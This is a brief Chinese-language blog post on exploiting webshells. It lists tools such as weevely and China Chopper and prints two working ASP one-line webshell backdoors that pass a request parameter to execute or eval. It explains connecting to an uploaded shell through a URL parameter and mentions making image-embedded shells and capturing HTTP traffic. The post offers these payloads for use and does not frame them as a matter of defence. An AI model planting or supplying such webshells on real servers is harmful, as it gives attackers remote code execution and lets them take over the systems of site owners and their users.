webshell利用

一句话工具
weevely,中国菜刀

asp一句话木马
<%execute request(“value”)%>

我们上传了一句话木马后,可用中国菜刀进行连接
<%eval request(“cmd”)%>

原理 :执行http://xxxx/a.asp?cmd=phpinfo()
a.asp是一句话木马所在的位置

制作图片一句话
C32asm

抓http包
wsexplorer 根据应用显示抓的包

评论

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

这个站点使用 Akismet 来减少垃圾评论。了解你的评论数据如何被处理